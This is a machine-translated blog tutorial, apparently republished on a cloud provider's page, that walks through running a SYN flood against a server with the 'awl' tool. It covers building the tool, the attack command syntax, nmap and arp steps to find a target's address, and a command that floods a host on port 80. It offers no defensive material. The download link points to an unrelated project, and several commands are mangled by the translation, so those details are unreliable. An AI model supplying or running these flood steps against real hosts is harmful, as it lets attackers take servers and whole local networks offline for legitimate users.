AWL multi-Process SYN attack

Source: Internet
Author: User
Tags ack

One, TCP connection state diagram

650) this.width=650; "src=" Https://s5.51cto.com/wyfs02/M01/8E/E0/wKioL1jOVEDxCvsVAAExl_xFLOM149.png "title=" 3.png "alt=" Wkiol1jovedxcvsvaaexl_xflom149.png "/>

The description is as follows:

server-side: LISTEN: Listening for connection requests from a remote TCP port

Client: syn-sent: Wait for a matching connection request after sending a connection request

Server-Side : syn-received: Waits for confirmation of a connection request after receiving and sending a connection request

Client /server side: established: Represents an open connection

Client: fin-wait-1: Waiting for a remote TCP connection interrupt request, or confirmation of a previous connection interrupt request

server-side: close-wait: Waiting for a connection interrupt request from a local user

Client: fin-wait-2: Waiting for connection interrupt request from remote TCP

server-side: Last-ack: Waiting for acknowledgement of the original connection interrupt request to the remote TCP

Client: time-wait: Wait enough time to ensure that the remote TCP receives a connection interrupt request acknowledgement

server-side: CLOSED: No connection Status



Ii. the process of SYN flood attack

After the server returns a confirmed Syn-ack packet, if the originating customer is a nonexistent client, then the server does not receive an ACK packet for the client response. At this point the server consumes a certain amount of system memory to wait for this pending connection until the wait timeout is closed before the memory can be cast. By IP spoofing, a malicious person sends a large number of SYN packets to the victim system, causing a large number of pending connections on the server and consuming large amounts of memory and TCP connections, resulting in the inability of normal clients to access the server


Third, use Awl to server implement SYN flood attack

1. Official website Https://gitlab.com/davical-project/awl/tags


2. Download the decompression installation

TAR-ZXVF awl-0.2.tar.gz

./configure--prefix=/usr/local/awl

Make -j 4

Make install


3. awl command format

awl-i eth0-m 00:0c:29:a9:f0:6c-d ip-p Port

Description

-I sends the interface of the package, if omitted the default is Eth0

- M is attacked the MAC address of the machine, the program can not get the Mac according to the attack IP, need to manually specify. Ping the target IP first, then arp-a. If omitted, FF:FF:FF:FF:FF:FF, Indicates that ARP broadcasts are issued to all hosts in the same network segment, SYN attacks are made, and the entire LAN is easily paralyzed

- d The IP of the attacked machine

- p Port of the attacked machine


4. Nmap View Object machine open ports and Mac

Nmap 192.168.1.123

or ping 192.168.1.123; Arp-n View Mac

650) this.width=650; "src=" Https://s5.51cto.com/wyfs02/M02/8E/E2/wKiom1jOVfqi3OpGAAAue6ybz68707.png "title=" 4.4. PNG "alt=" Wkiom1jovfqi3opgaaaue6ybz68707.png "/>650) this.width=650; src="/e/u261/themes/default/images/ Spacer.gif "style=" Background:url ("/e/u261/lang/zh-cn/images/localimage.png") no-repeat center;border:1px solid # DDD; "alt=" Spacer.gif "/>



5. Testing

/usr/local/awl/bin/awl-i eth0-m 00:0c:29:a9:f0:6c-d 192.168.1.123-p 80

650) this.width=650; "src=" Https://s3.51cto.com/wyfs02/M00/8E/E0/wKioL1jOVdfSnCjmAAApn9P2_Wk177.png "title=" 4.5. PNG "alt=" Wkiol1jovdfsncjmaaapn9p2_wk177.png "/>650) this.width=650; src="/e/u261/themes/default/images/ Spacer.gif "style=" Background:url ("/e/u261/lang/zh-cn/images/localimage.png") no-repeat center;border:1px solid # DDD; "alt=" Spacer.gif "/>


Netstat-antup|grep 80

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "style=" Background:url ("/e/u261/lang/zh-cn/ Images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "spacer.gif"/> 650) this.width=650; "Src=" Https://s2.51cto.com/wyfs02/M00/8E/E2/wKiom1jOVcGCt8cxAAAa0pd12g4065.png "title=" 4.51.png "alt=" Wkiom1jovcgct8cxaaaa0pd12g4065.png "/>




This article is from "A horse on the Plains" blog, please be sure to keep this source http://huangzp.blog.51cto.com/12434999/1908170

AWL multi-Process SYN attack

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.